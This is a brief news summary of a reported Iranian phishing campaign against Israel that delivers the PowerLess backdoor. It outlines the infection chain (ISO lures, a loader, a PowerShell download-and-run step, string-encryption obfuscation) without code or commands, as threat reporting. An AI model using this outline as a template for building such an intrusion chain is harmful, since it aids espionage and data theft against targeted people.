Iranian hackers linked with the Phosphorus hacker group are targeting Israel with a phishing backdoor campaign.
The backdoor can steal data, take screenshots, record audio, and log keystrokes.
- The campaign uses ISO images as a way of initiating the infection chain.
- The infection chain continues by having the victims click on the Iraq-themed pictures.
- After the victims do so, the loader launches the PowerLess implant.
- The ISO file contains text written in Arabic, English, and Hebrew and redirects users to academic content about Iraq from a legitimate NGO called the Arab Science and Technology Foundation.
- The infection chain is then completed by executing a PowerShell script that downloads two files from a remote server and runs them.
- Hackers are implementing an additional layer of 13 customized TEA32-BASED string-decryption functions to make decryption more difficult.
- Researchers are claiming that this new variant of the backdoor has better loading mechanisms and adopting techniques than its predecessor.